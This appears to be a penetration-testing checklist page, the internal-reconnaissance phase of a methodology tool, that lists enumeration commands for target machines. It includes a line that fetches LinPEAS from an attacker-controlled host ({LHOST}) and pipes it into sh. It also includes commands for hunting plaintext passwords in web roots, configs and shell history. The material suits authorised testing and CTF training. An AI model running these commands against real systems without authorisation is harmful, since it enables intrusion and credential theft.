Phase 06: Internal System & Network Reconnaissance
Run automated internal audit scripts, search for unquoted paths, crontabs, internal sockets, and scavenge plain-text credentials. This phase has 4 checklist items. Placeholders such as {TARGET_IP} are values for your target.
Local Discovery & Credential Hunting
Automated Enumeration Script Execution (LinPEAS / WinPEAS)
Highlight high-probability privilege escalation vectors in color-coded audit output.
curl -L http://{LHOST}:8000/linpeas.sh | sh or .\winPEASany.exeInternal Loopback Services & Listening Sockets
Locate local-only HTTP services, internal databases, or debugging ports on 127.0.0.1.
ss -tulpn | grep LISTEN or netstat -ano | findstr LISTENINGProcess Monitoring & Scheduled Jobs
Inspect recurring tasks running as root or administrative service accounts.
cat /etc/crontab /etc/cron.*/* or schtasks /query /fo LIST /vCredential Scavenging in Configs, Backups & Histories
Check web database credentials (wp-config.php, .env), bash history, and KeePass databases.
grep -rnwi "password" /var/www/ 2>/dev/null or history | tail -n 50
All phases
- Host Discovery & Surface Mapping
- Protocol & Service Enumeration
- Vulnerability Identification & Threat Modeling
- Foothold Execution & Initial Access
- Shell Stabilization & Context Triage
- Internal System & Network Reconnaissance
- Privilege Escalation & Lateral Movement
- Post-Exploitation, Flag Vault & Artifact Collection
Tick items off per machine. ZeroBox tracks checklist progress for every target. Open the methodology checklist